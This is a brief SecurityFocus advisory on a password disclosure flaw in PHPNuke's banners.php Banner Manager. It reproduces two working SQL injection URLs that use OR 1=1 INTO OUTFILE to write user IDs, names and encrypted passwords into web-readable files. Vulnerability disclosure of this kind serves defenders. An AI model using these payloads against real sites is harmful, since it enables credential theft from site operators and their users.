PHPNuke Banners.PHP Banner Manager Password Disclosure Vulnerability

The following exploit information was provided by Frog Man <leseulfrog@hotmail.com>:

This will save id, name and crypted password into
http://www.example.com/banners1.txt :
http://www.example.com/banners.php?op=Ok&login='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners1.txt

This will save crypted password into http://[target]/banners2.txt :
http://www.example.com/banners.php?op=Change&cid='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners2.txt


 

Privacy Statement
Copyright 2010, SecurityFocus